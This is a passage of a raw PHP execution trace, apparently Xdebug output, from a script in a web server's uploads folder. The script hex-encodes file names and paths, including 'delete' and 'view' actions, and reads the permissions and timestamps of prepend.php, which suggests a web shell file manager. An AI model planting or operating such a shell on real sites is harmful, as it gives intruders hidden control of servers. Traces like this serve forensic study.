3	1519	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1520	0	0.052806	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1520	1	0.052818	485496
3	1520	R			116
3	1521	0	0.052830	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1521	1	0.052841	485528
3	1521	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1522	0	0.052884	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1522	1	0.052937	485496
3	1522	R			101
3	1523	0	0.052951	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1523	1	0.052962	485528
3	1523	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1511	1	0.052992	485456
2	1511	R			'64656c657465'
2	1524	0	0.053006	485416	hex	1		/var/www/html/uploads/galaxy.php	117	1	'galaxy.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1525	0	0.053037	485416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'g'
3	1525	1	0.053049	485456
3	1525	R			103
3	1526	0	0.053061	485416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	103
3	1526	1	0.053072	485488
3	1526	R			'67'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '67'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1527	0	0.053102	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1527	1	0.053113	485488
3	1527	R			97
3	1528	0	0.053125	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1528	1	0.053137	485520
3	1528	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1529	0	0.053166	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1529	1	0.053177	485488
3	1529	R			108
3	1530	0	0.053189	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1530	1	0.053200	485520
3	1530	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1531	0	0.053230	485448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1531	1	0.053241	485488
3	1531	R			97
3	1532	0	0.053253	485448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1532	1	0.053265	485520
3	1532	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1533	0	0.053300	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'x'
3	1533	1	0.053312	485496
3	1533	R			120
3	1534	0	0.053324	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	120
3	1534	1	0.053335	485528
3	1534	R			'78'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '78'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1535	0	0.053365	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'y'
3	1535	1	0.053376	485496
3	1535	R			121
3	1536	0	0.053389	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	121
3	1536	1	0.053400	485528
3	1536	R			'79'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '79'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1537	0	0.053429	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1537	1	0.053441	485496
3	1537	R			46
3	1538	0	0.053453	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1538	1	0.053464	485528
3	1538	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1539	0	0.053493	485456	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1539	1	0.053505	485496
3	1539	R			112
3	1540	0	0.053517	485456	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1540	1	0.053528	485528
3	1540	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1541	0	0.053558	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1541	1	0.053569	485504
3	1541	R			104
3	1542	0	0.053581	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1542	1	0.053592	485536
3	1542	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1543	0	0.053622	485464	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1543	1	0.053633	485504
3	1543	R			112
3	1544	0	0.053646	485464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1544	1	0.053656	485536
3	1544	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1524	1	0.053686	485464
2	1524	R			'67616c6178792e706870'
2	1545	0	0.053703	484456	is_file	0		/var/www/html/uploads/galaxy.php	113	1	'/var/www/html/uploads/prepend.php'
2	1545	1	0.053726	484496
2	1545	R			TRUE
2	1546	0	0.053740	484456	filesize	0		/var/www/html/uploads/galaxy.php	114	1	'/var/www/html/uploads/prepend.php'
2	1546	1	0.053754	484496
2	1546	R			57
1		A						/var/www/html/uploads/galaxy.php	114	$sz = 0.0556640625
2	1547	0	0.053778	484352	round	0		/var/www/html/uploads/galaxy.php	115	2	0.0556640625	3
2	1547	1	0.053792	484424
2	1547	R			0.056
1		A						/var/www/html/uploads/galaxy.php	115	$sz = 0.056
1		A						/var/www/html/uploads/galaxy.php	116	$sz = '0.056KB'
2	1548	0	0.053829	484384	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1549	0	0.053859	484384	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1549	1	0.053871	484424
3	1549	R			47
3	1550	0	0.053884	484384	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1550	1	0.053896	484456
3	1550	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1551	0	0.053927	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1551	1	0.053939	484456
3	1551	R			118
3	1552	0	0.053951	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1552	1	0.053962	484488
3	1552	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1553	0	0.053993	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1553	1	0.054005	484456
3	1553	R			97
3	1554	0	0.054020	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1554	1	0.054032	484488
3	1554	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1555	0	0.054062	484416	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1555	1	0.054074	484456
3	1555	R			114
3	1556	0	0.054086	484416	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1556	1	0.054097	484488
3	1556	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1557	0	0.054127	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1557	1	0.054138	484464
3	1557	R			47
3	1558	0	0.054150	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1558	1	0.054161	484496
3	1558	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1559	0	0.054191	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1559	1	0.054202	484464
3	1559	R			119
3	1560	0	0.054214	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1560	1	0.054226	484496
3	1560	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1561	0	0.054256	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1561	1	0.054267	484464
3	1561	R			119
3	1562	0	0.054279	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1562	1	0.054291	484496
3	1562	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1563	0	0.054320	484424	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1563	1	0.054331	484464
3	1563	R			119
3	1564	0	0.054343	484424	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1564	1	0.054355	484496
3	1564	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1565	0	0.054384	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1565	1	0.054395	484472
3	1565	R			47
3	1566	0	0.054408	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1566	1	0.054419	484504
3	1566	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1567	0	0.054448	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1567	1	0.054460	484472
3	1567	R			104
3	1568	0	0.054472	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1568	1	0.054483	484504
3	1568	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1569	0	0.054513	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1569	1	0.054524	484472
3	1569	R			116
3	1570	0	0.054537	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1570	1	0.054548	484504
3	1570	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1571	0	0.054578	484432	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1571	1	0.054589	484472
3	1571	R			109
3	1572	0	0.054601	484432	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1572	1	0.054613	484504
3	1572	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1573	0	0.054643	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1573	1	0.054654	484480
3	1573	R			108
3	1574	0	0.054667	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1574	1	0.054678	484512
3	1574	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1575	0	0.054708	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1575	1	0.054719	484480
3	1575	R			47
3	1576	0	0.054737	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1576	1	0.054748	484512
3	1576	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1577	0	0.054777	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1577	1	0.054789	484480
3	1577	R			117
3	1578	0	0.054810	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1578	1	0.054822	484512
3	1578	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1579	0	0.054851	484440	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1579	1	0.054863	484480
3	1579	R			112
3	1580	0	0.054875	484440	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1580	1	0.054886	484512
3	1580	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1581	0	0.054915	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1581	1	0.054927	484488
3	1581	R			108
3	1582	0	0.054939	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1582	1	0.054950	484520
3	1582	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1583	0	0.054980	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	1583	1	0.054991	484488
3	1583	R			111
3	1584	0	0.055003	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	1584	1	0.055014	484520
3	1584	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1585	0	0.055044	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1585	1	0.055055	484488
3	1585	R			97
3	1586	0	0.055067	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1586	1	0.055078	484520
3	1586	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1587	0	0.055108	484448	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1587	1	0.055119	484488
3	1587	R			100
3	1588	0	0.055131	484448	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1588	1	0.055142	484520
3	1588	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1589	0	0.055172	484464	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	1589	1	0.055183	484504
3	1589	R			115
3	1590	0	0.055195	484464	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	1590	1	0.055207	484536
3	1590	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1548	1	0.055236	484464
2	1548	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	1591	0	0.055253	484480	hex	1		/var/www/html/uploads/galaxy.php	117	1	'view'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1592	0	0.055283	484480	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1592	1	0.055295	484520
3	1592	R			118
3	1593	0	0.055308	484480	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1593	1	0.055319	484552
3	1593	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1594	0	0.055349	484512	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	1594	1	0.055360	484552
3	1594	R			105
3	1595	0	0.055373	484512	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	1595	1	0.055384	484584
3	1595	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1596	0	0.055413	484512	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1596	1	0.055425	484552
3	1596	R			101
3	1597	0	0.055437	484512	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1597	1	0.055451	484584
3	1597	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1598	0	0.055481	484512	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1598	1	0.055492	484552
3	1598	R			119
3	1599	0	0.055505	484512	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1599	1	0.055516	484584
3	1599	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1591	1	0.055546	484520
2	1591	R			'76696577'
2	1600	0	0.055559	484496	hex	1		/var/www/html/uploads/galaxy.php	117	1	'prepend.php'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1601	0	0.055590	484496	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1601	1	0.055602	484536
3	1601	R			112
3	1602	0	0.055614	484496	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1602	1	0.055626	484568
3	1602	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1603	0	0.055655	484528	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1603	1	0.055667	484568
3	1603	R			114
3	1604	0	0.055679	484528	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1604	1	0.055690	484600
3	1604	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1605	0	0.055720	484528	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1605	1	0.055731	484568
3	1605	R			101
3	1606	0	0.055743	484528	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1606	1	0.055755	484600
3	1606	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1607	0	0.055784	484528	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1607	1	0.055795	484568
3	1607	R			112
3	1608	0	0.055807	484528	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1608	1	0.055818	484600
3	1608	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1609	0	0.055847	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	1609	1	0.055859	484576
3	1609	R			101
3	1610	0	0.055871	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	1610	1	0.055882	484608
3	1610	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1611	0	0.055911	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	1611	1	0.055922	484576
3	1611	R			110
3	1612	0	0.055934	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	1612	1	0.055946	484608
3	1612	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1613	0	0.055975	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	1613	1	0.055987	484576
3	1613	R			100
3	1614	0	0.055999	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	1614	1	0.056010	484608
3	1614	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1615	0	0.056039	484536	ord	0		/var/www/html/uploads/galaxy.php	18	1	'.'
3	1615	1	0.056050	484576
3	1615	R			46
3	1616	0	0.056062	484536	dechex	0		/var/www/html/uploads/galaxy.php	18	1	46
3	1616	1	0.056073	484608
3	1616	R			'2e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1617	0	0.056103	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1617	1	0.056114	484584
3	1617	R			112
3	1618	0	0.056126	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1618	1	0.056138	484616
3	1618	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1619	0	0.056171	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1619	1	0.056182	484584
3	1619	R			104
3	1620	0	0.056194	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1620	1	0.056206	484616
3	1620	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1621	0	0.056267	484544	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1621	1	0.056280	484584
3	1621	R			112
3	1622	0	0.056304	484544	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1622	1	0.056315	484616
3	1622	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	1600	1	0.056345	484544
2	1600	R			'70726570656e642e706870'
2	1623	0	0.056361	484672	filemtime	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/prepend.php'
2	1623	1	0.056375	484712
2	1623	R			1676246275
2	1624	0	0.056389	484608	date	0		/var/www/html/uploads/galaxy.php	117	2	'Y-m-d H:i'	1676246275
2	1624	1	0.056423	484936
2	1624	R			'2023-02-12 18:57'
2	1625	0	0.056439	484768	is_writable	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/prepend.php'
2	1625	1	0.056461	484808
2	1625	R			FALSE
2	1626	0	0.056475	484768	is_readable	0		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/prepend.php'
2	1626	1	0.056490	484808
2	1626	R			TRUE
2	1627	0	0.056505	484768	perms	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads/prepend.php'
3	1628	0	0.056518	484768	fileperms	0		/var/www/html/uploads/galaxy.php	29	1	'/var/www/html/uploads/prepend.php'
3	1628	1	0.056532	484808
3	1628	R			33261
2		A						/var/www/html/uploads/galaxy.php	29	$p = 33261
2		A						/var/www/html/uploads/galaxy.php	32	$i = '-'
2		A						/var/www/html/uploads/galaxy.php	39	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	40	$i .= 'w'
2		A						/var/www/html/uploads/galaxy.php	41	$i .= 'x'
2		A						/var/www/html/uploads/galaxy.php	42	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	43	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	44	$i .= 'x'
2		A						/var/www/html/uploads/galaxy.php	45	$i .= 'r'
2		A						/var/www/html/uploads/galaxy.php	46	$i .= '-'
2		A						/var/www/html/uploads/galaxy.php	47	$i .= 'x'
2	1627	1	0.056652	484808
2	1627	R			'-rwxr-xr-x'
2	1629	0	0.056667	484768	hex	1		/var/www/html/uploads/galaxy.php	117	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	1630	0	0.056711	484768	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1630	1	0.056723	484808
3	1630	R			47
3	1631	0	0.056736	484768	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1631	1	0.056748	484840
3	1631	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1632	0	0.056779	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	1632	1	0.056791	484840
3	1632	R			118
3	1633	0	0.056804	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	1633	1	0.056815	484872
3	1633	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1634	0	0.056848	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	1634	1	0.056861	484840
3	1634	R			97
3	1635	0	0.056873	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	1635	1	0.056921	484872
3	1635	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1636	0	0.056954	484800	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	1636	1	0.056965	484840
3	1636	R			114
3	1637	0	0.056978	484800	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	1637	1	0.056989	484872
3	1637	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1638	0	0.057027	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1638	1	0.057039	484848
3	1638	R			47
3	1639	0	0.057052	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1639	1	0.057063	484880
3	1639	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1640	0	0.057094	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1640	1	0.057105	484848
3	1640	R			119
3	1641	0	0.057117	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1641	1	0.057129	484880
3	1641	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1642	0	0.057159	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1642	1	0.057171	484848
3	1642	R			119
3	1643	0	0.057183	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1643	1	0.057194	484880
3	1643	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1644	0	0.057223	484808	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	1644	1	0.057234	484848
3	1644	R			119
3	1645	0	0.057247	484808	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	1645	1	0.057258	484880
3	1645	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1646	0	0.057287	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1646	1	0.057299	484856
3	1646	R			47
3	1647	0	0.057311	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1647	1	0.057323	484888
3	1647	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1648	0	0.057352	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	1648	1	0.057363	484856
3	1648	R			104
3	1649	0	0.057376	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	1649	1	0.057387	484888
3	1649	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1650	0	0.057416	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	1650	1	0.057428	484856
3	1650	R			116
3	1651	0	0.057440	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	1651	1	0.057451	484888
3	1651	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1652	0	0.057481	484816	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	1652	1	0.057493	484856
3	1652	R			109
3	1653	0	0.057505	484816	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	1653	1	0.057516	484888
3	1653	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1654	0	0.057546	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	1654	1	0.057557	484864
3	1654	R			108
3	1655	0	0.057569	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	1655	1	0.057581	484896
3	1655	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1656	0	0.057611	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	1656	1	0.057622	484864
3	1656	R			47
3	1657	0	0.057634	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	1657	1	0.057646	484896
3	1657	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1658	0	0.057675	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	1658	1	0.057687	484864
3	1658	R			117
3	1659	0	0.057699	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	1659	1	0.057710	484896
3	1659	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	1660	0	0.057744	484824	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	1660	1	0.057756	484864
3	1660	R			112
3	1661	0	0.057768	484824	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	1661	1	0.057779	484896
3	1661	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
